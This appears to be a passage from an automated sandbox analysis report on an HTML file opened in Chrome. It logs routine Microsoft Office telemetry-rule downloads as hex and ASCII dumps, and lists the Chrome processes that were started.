                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:21 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                            x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180021Z-174f7845968j6t2phC1EWRcfe800000016d000000000gsgx
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            143192.168.2.45014413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:22 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:23 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                            x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180023Z-174f78459688l8rvhC1EWRtzr00000000kt000000000s8xn
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            144192.168.2.45014513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:22 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:23 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                            x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180023Z-174f7845968frfdmhC1EWRxxbw00000016b000000000a525
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            145192.168.2.45014613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:22 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:23 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                            x-ms-request-id: fd6cd5ca-101e-0028-67ee-448f64000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180023Z-174f7845968jrjrxhC1EWRmmrs00000016fg000000004qnb
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            146192.168.2.45015113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:23 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                            x-ms-request-id: 36571fa1-001e-0079-6699-4312e8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180023Z-174f78459685726chC1EWRsnbg00000016b000000000bsqq
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            147192.168.2.45015913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:23 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:23 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                            x-ms-request-id: ba640e50-c01e-0079-3ff9-44e51a000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180023Z-174f7845968psccphC1EWRuz9s00000016g000000000fxp9
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:24 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            148192.168.2.45016113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:24 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:25 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4b8de5c5-901e-0029-6320-45274a000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180025Z-174f78459688l8rvhC1EWRtzr00000000kzg0000000003tx
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:25 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            149192.168.2.45016213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:25 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:25 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                            x-ms-request-id: bc455531-901e-0064-7a1b-41e8a6000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180025Z-174f7845968pght8hC1EWRyvxg00000009e000000000an5k
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:25 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                            Start time:12:58:30
                                                                                                                                                                                                                                                                            Start date:03/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\AudioplaybackVM--00-32AoTranscript.html"
                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                                            Start time:12:58:35
                                                                                                                                                                                                                                                                            Start date:03/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,1170405729456523145,12135267861160028348,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            No disassembly